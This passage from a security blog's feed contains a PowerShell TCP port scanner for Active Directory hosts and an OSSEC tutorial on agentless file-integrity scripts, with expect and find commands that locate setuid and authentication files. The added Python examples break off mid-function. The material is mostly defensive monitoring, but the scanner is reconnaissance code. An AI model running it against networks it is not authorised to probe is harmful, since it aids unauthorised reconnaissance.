<p>Why didn’t I end up using the socket.connect method? The timeout was too long and I lost patience fiddling with the <code>ConnectAsync</code> method. If interested, here is the code for the <code>socket.connect</code>:</p>

<pre><code>## Socket.Connect() example. Note that SendTimeout does not bound the blocking
## Connect() call, which is the delay described below.
$computer = "test"      # placeholder workstation name
$ipport = [int]80
$comp = [Net.Dns]::GetHostEntry($computer)
foreach ($ip in $comp.AddressList) {
   $ep = New-Object System.Net.IPEndPoint($ip, $ipport)
   $socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,
                                                  [System.Net.Sockets.SocketType]::Stream,
                                                  [System.Net.Sockets.ProtocolType]::Tcp)
   $optlevel = [System.Net.Sockets.SocketOptionLevel]::"Socket"
   $optname = [System.Net.Sockets.SocketOptionName]::"SendTimeout"
   $timeout = [Int]100
   $socket.SetSocketOption($optlevel,$optname,$timeout)
   $socket.Connect($ep)
   $socket.Close()
}
</code></pre>

<p>I’ve left out the AD code and the extra code that’s in the port scan script to show just the use of <code>socket.connect</code>. The workstation in the script is “test” and we’re trying to connect to port 80. If the host is using a firewall that will actively refuse the connection, we get a quick response which would be fine for a port scanner; but, if the port is simply not listening and there is no firewall to actively refuse the connection, there is a pretty significant delay before getting the connection error. This delay is not suitable for port scanning.</p>

<p>Instead of System.Net.Sockets.Socket, we will use the <code>System.Net.Sockets.TcpClient</code> class with the <code>BeginConnect</code> method in conjunction with a timeout (if it doesn’t complete in a given time, we assume the connection is not available). I’ve seen examples of this used on <code>poshcode.org</code> for testing a connection to port 135 prior to making WMI calls or other RPC calls.</p>

<pre><code>## $PortList comes from the script's parameter (a comma-separated list of ports);
## $CompName is normally set by the AD computer-object loop, which is omitted here.
param([int[]]$PortList)
$CompName = "test"   # placeholder; the full script iterates AD computer objects
$HostEntry = [Net.Dns]::GetHostEntry($CompName)
foreach ($ip in $HostEntry.AddressList) {
   Write-Host "Checking: $CompName on $ip"
   foreach ($tcpport in $PortList) {
      $TCPclient = new-Object system.Net.Sockets.TcpClient
      $Connection = $TCPclient.BeginConnect($ip,$tcpport,$null,$null)
      $TimeOut = $Connection.AsyncWaitHandle.WaitOne(3000,$false)  ## 3 second timeout can be modified
      if(!$TimeOut)   {
         ## WaitOne returned false: nothing answered within 3 seconds.
         $TCPclient.Close()
         Write-Host "     OK: Port $tcpport is closed."
      }
      else {
         try {
            $TCPclient.EndConnect($Connection) | out-Null
            $TCPclient.Close()
            ## The "OK: Port ... is closed" lines show processing progress; I prefer
            ## to see them. Comment them out to output only open ports.
            Write-Host "     " -nonewline
            Write-Host "Host: $CompName has port $tcpport open!" -foregroundcolor red -backgroundcolor yellow
         }
         catch {
            ## Machine actively refused the connection. The port is not open but $TimeOut was still true
            ## Uncomment next line to output the error for this.
            ## write-host $_
            write-host "     OK: Port $tcpport is closed."
            $TCPclient.Close()
         }
      }
   }
}
</code></pre>

<div class="wp-caption" style="float: right;margin: 5px;margin-left: 60px;margin-right: 21px;"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/ScreenHunter_08Dec.0314.14.gif" title="" rel="lightbox"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/ScreenHunter_08Dec.0314.14_thumb.gif" alt="router in router.png" border="0" width="229" height="248" /></a><p class="wp-caption-text">Note: the script requires a parameter<br />which is a comma-separated list of ports.<br /><br />Example: ad-portscan.ps1 23,80,443,1433</p></div>

<p>You can see from the code snippet above that we are using <code>Sockets.TcpClient</code> rather than <code>Sockets.Socket</code>, and the method used is <code>BeginConnect</code> rather than <code>Connect</code> as in the previous example. If the connection is not available in 3 seconds, the timeout expires and the script reports the port as closed. In some cases, Windows Firewall will refuse the connection before the timeout expires. I found in these cases that, when attempting to complete the connection, an error reported that the connection was refused and was never connected to begin with. This is where the TRY / CATCH comes in: we check that <code>EndConnect</code> completes cleanly and can close the connection, and only then report that the port is open.</p>

<p>You can find the full script <a href="http://www.praetoriansecuritygroup.com/files/downloads/tools/ad-portscan.txt" target="_blank">here</a>. While it is by no means a replacement for your standard port scanner, it provides a quick way to scan your AD hosts for the ports you specify, and it may get you digging further into <code>Sockets.Socket</code>, which can lead to many places.</p>

<p><em>Note: the script requires a parameter which is a comma-separated list of ports.</em></p>

<p><em>Example</em>: <code>ad-portscan.ps1 23,80,443,1433</code></p>

<hr />

<ul>
<li><a href="http://msdn.microsoft.com/en-us/library/system.net.sockets.aspx">http://msdn.microsoft.com/en-us/library/system.net.sockets.aspx</a></li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/11/from-promiscuous-to-port-scanning-with-powershell/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>OSSEC: Agentless scripts</title>
		<link>http://praetorianprefect.com/archives/2009/11/ossec-agentless-scripts/</link>
		<comments>http://praetorianprefect.com/archives/2009/11/ossec-agentless-scripts/#comments</comments>
		<pubDate>Tue, 03 Nov 2009 23:57:47 +0000</pubDate>
		<dc:creator>Jeremy Rossi</dc:creator>
				<category><![CDATA[Administration]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[agentless]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[openbsd]]></category>
		<category><![CDATA[ossec]]></category>
		<category><![CDATA[ssh]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=1419</guid>
		<description><![CDATA[In my last OSSEC post "<a href="/archives/2009/11/ossec-agentless-to-save-the-day/">OSSEC: Agentless to save the day</a>" I went over how to set up agentless monitoring using the built-in scripts.  With this post I am going to get into the details of how to modify the OSSEC-supplied scripts to do your bidding.]]></description>
			<content:encoded><![CDATA[<p>In my last OSSEC post <a href="/archives/2009/11/ossec-agentless-to-save-the-day/">OSSEC: Agentless to save the day</a> I went over how to set up agentless monitoring using the built-in scripts.  In this post I am going to get into the details of how to modify the OSSEC-supplied scripts to do your bidding.</p>

<h2>Table of Contents</h2>

<div class="wp-caption" style="float: right;margin: 5px;margin-left: 42px;margin-right: 21px;"><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/Screen-shot-2009-11-02-at-8.06.14-PM.png" border="1" alt="ossec_logo" width="66" height="64" /></div>

<ul>
<li><p><a href="#agentless_scripts">Agentless Scripts</a></p>

<ul>
<li><a href="#agentless_scripts_periodic_diff">Periodic diff Specification</a></li>
<li><a href="#agentless_scripts_periodic">Periodic Specification</a></li>
</ul></li>
<li><a href="#ssh_integrity_check_linux">Agentless Script: ssh_integrity_check_linux</a></li>
<li><p><a href="#ssh_dmz_linux">Our own Agentless Script: ssh_dmz_linux</a></p>

<ul>
<li><a href="#finding_setuid_setgid">Finding all setuid and setgid files</a></li>
<li><a href="#finding_app_files">Finding all authentication and applications specific files</a></li>
<li><a href="#merging_finds">Merging finds</a></li>
<li><a href="#creating_ssh_dmz_linux">Creating ssh_dmz_linux</a></li>
<li><a href="#testing_ssh_dmz_linux">Testing</a></li>
</ul></li>
</ul>

<h2 id="agentless_scripts">Agentless Scripts</h2>

<p>All scripts that work with OSSEC agentless security monitoring use <code>stdout</code> for communication and reporting to the OSSEC server.  This makes writing scripts for OSSEC simple, as you do not need to do anything more than print or echo to <code>stdout</code>.  The format of the output does need to meet the OSSEC specification, but that is a very simple thing to do.</p>

<p>Before we move to the specification details I need to explain that OSSEC agentless runs two different types of scripts, namely the following:</p>

<table>
<thead>
<tr>
  <th>Type</th>
  <th>Description</th>
</tr>
</thead>
<tbody>
<tr>
  <td>periodic_diff</td>
  <td>Scripts output data to the OSSEC agentless process that will then be compared to past runs and if there are differences an OSSEC alert will be generated.</td>
</tr>
<tr>
  <td>periodic</td>
  <td>Scripts output controlled messages to the OSSEC agentless process that will then be processed accordingly.</td>
</tr>
</tbody>
</table>

<h4 id="agentless_scripts_periodic_diff">Periodic diff Specification</h4>

<p>The output format for periodic_diff is very simple: any and all output after the agentless command &#8220;<code>STORE: now</code>&#8221; and before the next OSSEC command is stored and compared for differences.  This type of script is mostly used for network devices such as those running Cisco IOS, Juniper JunOS, and other products.</p>

<p>Scripts that use the <code>periodic_diff</code> make use of the following commands:</p>

<table>
<thead>
<tr>
  <th>Command</th>
  <th>Description</th>
</tr>
</thead>
<tbody>
<tr>
  <td>INFO:</td>
  <td>The string following INFO will be logged to <code>/var/ossec/logs/ossec.log</code> by OSSEC for debugging.</td>
</tr>
<tr>
  <td>ERROR:</td>
  <td>Error needs to be reported.  The string following this command is forwarded to the OSSEC manager, and the OSSEC process closes down the script.</td>
</tr>
<tr>
  <td>STORE:</td>
  <td>All lines that follow this command are stored and compared to previous runs of the script.</td>
</tr>
</tbody>
</table>

<p>Here is an example of a periodic_diff script that comes with OSSEC. (<em>Please note with all agentless scripts you must be in the root of the OSSEC install for them to function correctly</em>.)</p>

<pre><code>obsd46#( cd /var/ossec &amp;&amp; ./agentless/ssh_pixconfig_diff cisco@172.17.0.1 'show hardware' )
spawn ssh -c des cisco@172.17.0.1
No valid ciphers for protocol version 2 given, using defaults.
Password: 

a.zfw.tss&gt;INFO: Starting.
enable
Password: 
a.zfw.tss#ok on enable pass

STORE: now
no pager
             ^
% Invalid input detected at '^' marker.

a.zfw.tss#term len 0
a.zfw.tss#terminal pager 0
                     ^
% Invalid input detected at '^' marker.

a.zfw.tss#show version | grep -v Configuration last| up
                         ^
% Invalid input detected at '^' marker.

a.zfw.tss#show running-config
Building configuration...


Current configuration : 14631 bytes
!
version 12.4

[................SNIP CONFIG.................]

a.zfw.tss#show hardware
Cisco IOS Software, 3800 Software (C3845-ADVENTERPRISEK9-M), Version 12.4(24)T1, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2009 by Cisco Systems, Inc.
Compiled Fri 19-Jun-09 19:21 by prod_rel_team

ROM: System Bootstrap, Version 12.3(11r)T2, RELEASE SOFTWARE (fc1)

a.zfw.tss uptime is 1 week, 5 days, 7 hours, 29 minutes
System returned to ROM by reload at 13:34:26 UTC Thu Oct 22 2009
System image file is "flash:c3845-adventerprisek9-mz.124-24.T1.bin"


This product contains cryptographic features and is subject to United
States and local country laws governing import, export, transfer and
use. Delivery of Cisco cryptographic products does not imply
third-party authority to import, export, distribute or use encryption.
Importers, exporters, distributors and users are responsible for
compliance with U.S. and local country laws. By using this product you
agree to comply with applicable laws and regulations. If you are unable
to comply with U.S. and local laws, return this product immediately.

A summary of U.S. laws governing Cisco cryptographic products may be found at:

http://www.cisco.com/wwl/export/crypto/tool/stqrg.html

If you require further assistance please contact us by sending email to
export@cisco.com.

Cisco 3845 (revision 1.0) with 1007615K/40960K bytes of memory.
Processor board ID FTX1043A2CR
2 Gigabit Ethernet interfaces
1 ATM interface
1 Virtual Private Network (VPN) Module
4 CEM T1/E1 ports
DRAM configuration is 64 bits wide with parity enabled.
479K bytes of NVRAM.
492015K bytes of USB Flash usbflash0 (Read/Write)
62720K bytes of ATA System CompactFlash (Read/Write)

Configuration register is 0x2102


a.zfw.tss#exit
Connection to 172.17.0.1 closed by remote host.
Connection to 172.17.0.1 closed.

INFO: Finished.

</code></pre>

<p>In the example above the script stores the contents between &#8220;<code>STORE: now</code>&#8221; and &#8220;<code>INFO: Finished.</code>&#8221;.  If this is the first time OSSEC agentless has run this command, no alert is generated and the contents are saved for later comparison.   If OSSEC agentless has a stored copy from a previous execution, it compares the two and generates an alert if there are any differences.</p>

<h4 id="agentless_scripts_periodic">Periodic Specification</h4>

<p>The periodic specification has more options and gives more control to the script writer on what actions OSSEC will take.  Once again <code>stdout</code> is used for communication so script writing is easy.</p>

<table>
<thead>
<tr>
  <th>Command</th>
  <th>Description</th>
</tr>
</thead>
<tbody>
<tr>
  <td>INFO:</td>
  <td>The string following INFO will be logged to <code>/var/ossec/logs/ossec.log</code> by OSSEC for debugging.</td>
</tr>
<tr>
  <td>ERROR:</td>
  <td>Error needs to be reported.  The string following this command is forwarded to the OSSEC manager, and the OSSEC process closes down the script.</td>
</tr>
<tr>
  <td>FWD:</td>
  <td>The string following FWD is a colon-delimited list of attributes of a given file, followed by the file's path.</td>
</tr>
</tbody>
</table>

<p>Example of a real <code>FWD:</code> command:</p>

<pre><code>FWD: 19419:600:0:0:fb30de5b02029950ae05885a3d407c8c:017cd6118cdc166ee8eba8af1b7fdad6763203d3 ./.bash_history
</code></pre>

<p>The fields break down as follows:</p>

<table>
<thead>
<tr>
  <th>Field</th>
  <th>Description</th>
</tr>
</thead>
<tbody>
<tr>
  <td><code>FWD:</code></td>
  <td>The OSSEC Command</td>
</tr>
<tr>
  <td><code>19419</code></td>
  <td>Total size of file, in bytes</td>
</tr>
<tr>
  <td><code>600</code></td>
  <td>Access rights of file in octal</td>
</tr>
<tr>
  <td><code>0</code></td>
  <td>User ID of file owner</td>
</tr>
<tr>
  <td><code>0</code></td>
  <td>Group ID of file owner</td>
</tr>
<tr>
  <td><code>fb30de5b02029950ae05885a3d407c8c</code></td>
  <td>MD5 Hash of file</td>
</tr>
<tr>
  <td><code>017cd6118cdc166ee8eba8af1b7fdad6763203d3</code></td>
  <td>SHA1 Hash of file</td>
</tr>
<tr>
  <td>./.bash_history</td>
  <td>Path and name of file</td>
</tr>
</tbody>
</table>

<p>Using this format OSSEC can store the attributes of a file and, on a future run, compare them to check that they are still the same.  If they are not, an alert is generated.  Here is an example of the alert produced by a password change on a Linux system:</p>

<pre><code>OSSEC HIDS Notification.
2009 Sep 21 15:19:00

Received From: (ssh_integrity_check_linux) root@172.17.20.20-&gt;syscheck
Rule: 550 fired (level 7) -&gt; "Integrity checksum changed."
Portion of the log(s):

Integrity checksum changed for: '/etc/shadow'
Old md5sum was: '0d92e12c92f3edcf9d8876ea57c5f677'
New md5sum is : '2bd51b61dea17c5682fb2c0cf4f92c63'
Old sha1sum was: '2270c03a920ef8dd50e11cefdef046a8660f7a29'
New sha1sum is : 'd9518ea9022b10d07f81925c6d7f2abb4364b548'

--END OF NOTIFICATION
</code></pre>
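<p>To make the periodic specification concrete, here is an added Python example (not OSSEC's own implementation and not from the original post) that parses <code>FWD:</code> lines and diffs two runs the way the manager's stored-state comparison does, producing the same checksum-changed layout as the notification above. The two runs it compares are constructed; the <code>/etc/shadow</code> hashes are the ones from the alert above, everything else is made up.</p>

```python
"""Parse OSSEC agentless FWD: lines and diff two runs of a periodic script.

Added example, not OSSEC's own code: it models what the manager does with
the periodic state (keep one run's file attributes, then alert when a later
run reports different checksums for the same path). RUN_1/RUN_2 below are
constructed sample output; only /etc/shadow changes between them.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class FileStat:
    size: int
    mode: str  # permission bits as printed by stat %a, e.g. "600" or "4755"
    uid: int
    gid: int
    md5: str
    sha1: str
    path: str


def parse_fwd_line(line: str) -> FileStat:
    """Parse 'FWD: size:mode:uid:gid:md5:sha1 path' into a FileStat."""
    if not line.startswith("FWD: "):
        raise ValueError(f"not a FWD line: {line!r}")
    # The attribute list never contains spaces, so the first space ends it
    # and everything after it is the path (which may itself contain spaces).
    attrs, _, path = line[len("FWD: "):].partition(" ")
    fields = attrs.split(":")
    if len(fields) != 6 or not path:
        raise ValueError(f"malformed FWD line: {line!r}")
    size, mode, uid, gid, md5, sha1 = fields
    if len(md5) != 32 or len(sha1) != 40:
        raise ValueError(f"bad digest length in: {line!r}")
    int(md5 + sha1, 16)  # raises ValueError unless both digests are hex
    return FileStat(int(size), mode, int(uid), int(gid), md5.lower(), sha1.lower(), path)


def parse_run(output: str) -> Dict[str, FileStat]:
    """Collect every FWD: entry from one script run, keyed by path.

    INFO: lines are only logged by the manager, so they are skipped here; an
    ERROR: line aborts the run, as the specification shuts the script down.
    """
    entries: Dict[str, FileStat] = {}
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("ERROR:"):
            raise RuntimeError(line)
        if line.startswith("FWD: "):
            entry = parse_fwd_line(line)
            entries[entry.path] = entry
    return entries


def compare_runs(old: Dict[str, FileStat], new: Dict[str, FileStat]) -> List[str]:
    """Return one alert message per file whose attributes changed between runs.

    Checksum changes use the layout of the notification in the post; the
    wording for permission changes and added or removed files is ours.
    """
    alerts: List[str] = []
    for path in sorted(new):
        cur, prev = new[path], old.get(path)
        if prev is None:
            alerts.append(f"New file added: '{path}'")
        elif (prev.md5, prev.sha1) != (cur.md5, cur.sha1):
            alerts.append(
                f"Integrity checksum changed for: '{path}'\n"
                f"Old md5sum was: '{prev.md5}'\nNew md5sum is : '{cur.md5}'\n"
                f"Old sha1sum was: '{prev.sha1}'\nNew sha1sum is : '{cur.sha1}'"
            )
        elif (prev.mode, prev.uid, prev.gid) != (cur.mode, cur.uid, cur.gid):
            alerts.append(
                f"Permissions or ownership changed for: '{path}' "
                f"({prev.mode}:{prev.uid}:{prev.gid} -> {cur.mode}:{cur.uid}:{cur.gid})"
            )
    for path in sorted(set(old) - set(new)):
        alerts.append(f"File deleted: '{path}'")
    return alerts


# Constructed sample output of two consecutive runs (INFO: framing as the
# script emits it; the /etc/passwd digests are made up, /etc/shadow's are the
# ones from the alert in the post).
RUN_1 = """INFO: Starting.
FWD: 1242:644:0:0:0b9e4f4e3d2c1b0a9f8e7d6c5b4a3928:1111111111111111111111111111111111111111 /etc/passwd
FWD: 864:400:0:0:0d92e12c92f3edcf9d8876ea57c5f677:2270c03a920ef8dd50e11cefdef046a8660f7a29 /etc/shadow
INFO: Finished.
"""
RUN_2 = """INFO: Starting.
FWD: 1242:644:0:0:0b9e4f4e3d2c1b0a9f8e7d6c5b4a3928:1111111111111111111111111111111111111111 /etc/passwd
FWD: 871:400:0:0:2bd51b61dea17c5682fb2c0cf4f92c63:d9518ea9022b10d07f81925c6d7f2abb4364b548 /etc/shadow
INFO: Finished.
"""


def demo() -> List[str]:
    """Compare the two constructed runs; returns the alerts (one, for /etc/shadow)."""
    return compare_runs(parse_run(RUN_1), parse_run(RUN_2))
```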

<h2 id="ssh_integrity_check_linux">Agentless Script: ssh_integrity_check_linux</h2>

<p>Now that we have an understanding of how agentless scripts communicate with the parent OSSEC process, let&#8217;s move on to a working example.  The OSSEC-supplied script <code>ssh_integrity_check_linux</code> is a great place to start, so let&#8217;s open it up and see what is going on.</p>

<pre><code>obsd46# cat /var/ossec/agentless/ssh_integrity_check_linux
#!/usr/bin/env expect

# @(#) $Id: ssh_integrity_check_linux,v 1.11 2009/06/24 17:06:21 dcid Exp $
# Agentless monitoring
#
# Copyright (C) 2009 Trend Micro Inc.
# All rights reserved.
#
# This program is a free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public
# License (version 3) as published by the FSF - Free Software
# Foundation.


# Main script.
source "agentless/main.exp"


# SSHing to the box and passing the directories to check.
if [catch {
    spawn ssh $hostname
} loc_error] {
    send_user "ERROR: Opening connection: $loc_error.\n"
    exit 1;
}


source $sshsrc
source $susrc

set timeout 600
send "echo \"INFO: Starting.\"; for i in `find $args 2&gt;/dev/null`;do tail \$i &gt;/dev/null 2&gt;&amp;1 &amp;&amp; md5=`md5sum \$i | cut -d \" \" -f 1` &amp;&amp; sha1=`sha1sum \$i | cut -d \" \" -f 1` &amp;&amp; echo FWD: `stat --printf \"%s:%a:%u:%g\" \$i`:\$md5:\$sha1 \$i; done; exit\r"
send "exit\r"

expect {
    timeout {
        send_user "ERROR: Timeout while running commands on host: $hostname .\n"
        exit 1;
    }
    eof {
        send_user "\nINFO: Finished.\n"
        exit 0;
    }
}

exit 0;
</code></pre>

<p>The comments in the script hint at what is going on, but everything up to and including <code>set timeout 600</code> is related to setting up the <code>expect</code> functions and the code for handling the <code>ssh</code> subprocess and connecting to the remote host.  I am not going to spend any time on this section; I am just going to make use of it.</p>

<p>The meat of what is getting processed on the remote end all happens in two lines.</p>

<pre><code>send "echo \"INFO: Starting.\"; for i in `find $args 2&gt;/dev/null`;do tail \$i &gt;/dev/null 2&gt;&amp;1 &amp;&amp; md5=`md5sum \$i | cut -d \" \" -f 1` &amp;&amp; sha1=`sha1sum \$i | cut -d \" \" -f 1` &amp;&amp; echo FWD: `stat --printf \"%s:%a:%u:%g\" \$i`:\$md5:\$sha1 \$i; done; exit\r"
send "exit\r"
</code></pre>

<p>Let&#8217;s break this down to see what is happening.</p>

<p>The <code>send</code> command pushes the following string to the ssh subprocess, which runs it on the remote end of the connection.  Before the string is sent to the remote host, <code>expect</code> processes it internally: it substitutes variables and resolves the escaped special characters.</p>

<p>The escape sequences are handled first, and in the case of our example all escaped special characters are processed: <code>\"</code>, <code>\r</code>, and <code>\$</code> are replaced with <code>"</code>, a carriage return, and <code>$</code> respectively.  The escapes are needed so that these characters do not interfere with <code>expect</code>&#8217;s own string processing and control.  We will need to handle special characters in this way when we begin writing our own script.</p>

<p>While the special characters are being handled by <code>expect</code>, it also looks for variables to replace; in this case it will find <code>$args</code> and replace it with whatever arguments were passed to the script by the OSSEC agentless process.  If we specified the following in <code>/var/ossec/etc/ossec.conf</code>, the <code>$args</code> variable would be replaced with &#8220;<code>/bin /etc /sbin</code>&#8221;.</p>

<pre><code>  &lt;agentless&gt;
    &lt;type&gt;ssh_integrity_check_linux&lt;/type&gt;
    &lt;frequency&gt;3600&lt;/frequency&gt;
    &lt;host&gt;root@172.17.20.20&lt;/host&gt;
    &lt;state&gt;periodic&lt;/state&gt;
    &lt;arguments&gt;/bin /etc /sbin&lt;/arguments&gt;
  &lt;/agentless&gt;
</code></pre>

<p>Back to the commands that get run.  Once <code>expect</code> has completed its replacements we are left with this command:</p>

<pre><code>echo "INFO: Starting."; for i in `find /bin /etc /sbin 2&gt;/dev/null`;do tail $i &gt;/dev/null 2&gt;&amp;1 &amp;&amp; md5=`md5sum $i | cut -d " " -f 1` &amp;&amp; sha1=`sha1sum $i | cut -d " " -f 1` &amp;&amp; echo FWD: `stat --printf "%s:%a:%u:%g" $i`:$md5:$sha1 $i; done; exit
exit
</code></pre>

<p>The command uses the Unix <code>find</code> command to locate every file under the specified paths (from the arguments passed), generates an OSSEC <code>FWD:</code> command for each one using <code>stat</code>, <code>md5sum</code>, and <code>sha1sum</code>, and prints it to <code>stdout</code>.  Here is an example of the output of a check:</p>

<pre><code>spawn ssh root@172.17.20.20
Last login: Wed Nov  4 11:32:51 2009 from 172.17.20.131^M
[linux26 ~]# 
INFO: Started.
echo "INFO: Starting."; for i in `find {/bin /etc /sbin} 2&gt;/dev/null`;do tail $i &gt;/dev/null 2&gt;&amp;1 &amp;&amp; 
md5=`md5sum $i | cut -d " " -f 1` &amp;&amp; sha1=`sh a1sum $i | cut -d " " -f
 1` &amp;&amp; echo FWD: `stat --printf "%s:%a:%u:%g" $i`:$md5:$sha1 $i; done; exit
INFO: Starting.
FWD: 833:644:0:0:4148adea745af5121963f6b731b60013:60877a6f6981b16c0d53d32bcd3f07d41cfb5bd4 /etc/modprobe.d/
glib2.sh
[...........SNIP............]
FWD: 1696:644:0:0:c2bd306b205ad9e81fb02ce6b225d384:5244d65815cb228a4fac7bc4c1c7774508fb7505 /etc/nsswitch.conf
FWD: 85179:644:0:0:8db574225cd1068b47e77ceccd96f8ff:b5ef6183b35ee9d1b66ed2cefe98003c5bd99192 /etc/sensors.conf
FWD: 49:644:0:0:52c3df2f1edf30ca3db82174be3a68d2:1934648f2429b70b1f729d343a6956fb0ea73136 /etc/php.d/imap.ini
FWD: 873:644:0:0:04559d1fe27ecd079b69df8b319f937e:e5cab1bf1f9e4bc4386309f4e00a9b7be3e543a2 /etc/php.d/memcache.ini
FWD: 59:644:0:0:94636ba6c4bac9d8d49d9de1a513ae0c:41d5164a2c6e332e40edf55c59a2d0df8a260964 /etc/php.d/pdo_mysql.ini
FWD: 49:644:0:0:917dbbafbfaaa20f660063d627123dae:0e829d4ffc69f58dc258510b4b8452412e31ccc5 /etc/php.d/json.ini
FWD: 0:644:0:0:d41d8cd98f00b204e9800998ecf8427e:da39a3ee5e6b4b0d3255bfef95601890afd80709 /etc/wvdial.conf
logout
Connection to 172.17.20.20 closed.

INFO: Finished.
</code></pre>

<h2 id="ssh_dmz_linux">Our own Agentless Script: ssh_dmz_linux</h2>

<p>Using the built-in OSSEC agentless scripts is great, but sometimes we need more focused scanning and checking.  So let&#8217;s modify <code>ssh_integrity_check_linux</code> for our environment.</p>

<p>The goals for this new script will be to watch for changes to files based on the following criteria:</p>

<ul>
<li>All setuid and setgid files</li>
<li>All files related to authentication (including .htaccess and ssh files)</li>
<li>All application specific files (apache, ssh)</li>
</ul>

<h4 id="finding_setuid_setgid">Finding all setuid and setgid files</h4>

<p>Let&#8217;s start by identifying a method to locate all files with their setuid or setgid bits set.  To do this we will ssh to the host <code>172.17.20.20</code> and use <code>find</code> to locate the files.</p>

<pre><code>obsd46# sudo -u ossec ssh root@172.17.20.20
[linux26 ~]# find / -type f \( -perm -4000 -o -perm -2000 \) 
/sbin/umount.nfs
/sbin/netreport
/sbin/unix_chkpwd
/sbin/mount.nfs
/sbin/pam_timestamp_check
/sbin/mount.nfs4
/sbin/umount.nfs4
/bin/ping6
/bin/su
/bin/umount
/bin/ping
/bin/mount
/lib/dbus-1/dbus-daemon-launch-helper
/usr/libexec/openssh/ssh-keysign
/usr/libexec/utempter/utempter
/usr/sbin/usernetctl
/usr/sbin/postqueue
/usr/sbin/userhelper
/usr/sbin/userisdnctl
/usr/sbin/postdrop
/usr/sbin/suexec
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/locate
/usr/bin/wall
/usr/bin/sudoedit
/usr/bin/gpasswd
/usr/bin/lockfile
/usr/bin/newgrp
/usr/bin/write
/usr/bin/screen
/usr/bin/passwd
/usr/bin/chage
/usr/bin/sperl5.8.8
/usr/bin/crontab
/usr/bin/ssh-agent
</code></pre>

<h4 id="finding_app_files">Finding all authentication and application-specific files</h4>

<p>Finding all files with setuid and setgid was simple, but finding all files related to authentication is more involved. This of course will vary from system to system, but this should be a good starting point.</p>

<pre><code>obsd46# sudo -u ossec ssh root@172.17.20.20
[linux26 ~]# find / \( -name ".ssh" -o -name "ssh" -o -name "sshd" -o -name "httpd" -o -name ".htaccess" 
-o -name "pam.d" \) -exec find {} \;
/var/www/html/admin/modules/framework/var/www/html/admin/modules/.htaccess
/etc/httpd
/etc/httpd/conf
/etc/httpd/conf.d
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/proxy_ajp.conf
/etc/httpd/conf.d/README
/etc/httpd/conf.d/ssl.conf
/etc/httpd/conf.d/welcome.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/magic
/etc/httpd/logs
/etc/httpd/modules
/etc/httpd/run
/etc/logrotate.d/httpd
/etc/pam.d
/etc/pam.d/authconfig
[...................SNIP PAM Files.....................]
/etc/pam.d/system-config-network-cmd
/etc/pam.d/vsftpd
/etc/rc.d/init.d/httpd
/etc/rc.d/init.d/sshd
/etc/ssh
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/sysconfig/httpd
/root/.ssh
/root/.ssh/authorized_keys
/usr/bin/ssh
/usr/lib/httpd
/usr/lib/httpd/modules
/usr/lib/httpd/modules/libphp5.so
[...................SNIP Apache modules................]

/usr/lib/httpd/modules/mod_vhost_alias.so
/usr/sbin/httpd
/usr/sbin/sshd
/usr/src/tbm-pbxconfig-5.5.1/amp_conf/htdocs/admin/modules/framework/htdocs/admin/modules/.htaccess
/usr/src/tbm-pbxconfig-5.5.1/amp_conf/htdocs/admin/modules/.htaccess
/var/empty/sshd
/var/empty/sshd/etc
/var/empty/sshd/etc/localtime
/var/www/html/admin/modules/framework/var/www/html/admin/modules/.htaccess
/var/www/html/admin/modules/.htaccess
</code></pre>

<h4 id="merging_finds">Merging finds</h4>

<p>Now we have two basic <code>find</code> methods that identify the files we want to monitor for changes, but our finds were a little greedy, so we need a way to strip unwanted files out of the list.  As this is a Unix system, <code>egrep</code> is the king of finding or removing items from a list.  To simplify things we can use <code>egrep</code> with the <code>-v</code> command line argument, which tells <code>egrep</code> <strong>NOT</strong> to print any matching items.</p>

<p>Just to make sure that we do not end up processing files twice, we can make use of the <code>sort</code> command with the <code>-u</code> argument to remove any duplicates.</p>

<p>Here is how we put together both <code>find</code>s, <code>egrep</code>, and <code>sort</code> to locate and filter what is needed.</p>

<pre><code>(find / -type f \( -perm -4000 -o -perm -2000 \) &amp;&amp; find / \( -name ".ssh" -o -name "ssh" -o -name "sshd" -o -name "httpd" -o -name ".htaccess" -o -name "pam.d" \) -exec find {} \; ) 2&gt;/dev/null | egrep -v "known_hosts|moduli|var\/log|var\/lock" | sort -u
</code></pre>

<p>With the above command we have found all the files and paths we would like to monitor, but this still needs to be integrated into a script on the OSSEC server.</p>
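<p>The selection rules above can be exercised offline. The following Python is an added example, not the post's script or OSSEC code: it re-expresses the two finds, the <code>egrep -v</code> exclusion and the <code>sort -u</code> dedupe as functions, emits the same <code>FWD:</code> lines the remote shell loop produces (it assumes the GNU <code>stat %a</code> mode format), and runs against a small constructed directory tree so each rule can be checked against a known file.</p>

```python
"""Select the files ssh_dmz_linux watches and emit FWD: lines for them.

Added example, not the post's script: the remote-side selection rules are
re-expressed in Python (setuid/setgid regular files, plus everything under
any entry named .ssh, ssh, sshd, httpd, .htaccess or pam.d, minus the
egrep -v exclusions, deduplicated like sort -u) so they can be exercised
offline against the constructed tree that build_sample_tree() creates.
"""
import hashlib
import os
import re
import stat
import tempfile
from typing import Iterator, List

NAME_PATTERNS = {".ssh", "ssh", "sshd", "httpd", ".htaccess", "pam.d"}
EXCLUDE = re.compile(r"known_hosts|moduli|var/log|var/lock")  # the egrep -v list


def is_setid_file(path: str) -> bool:
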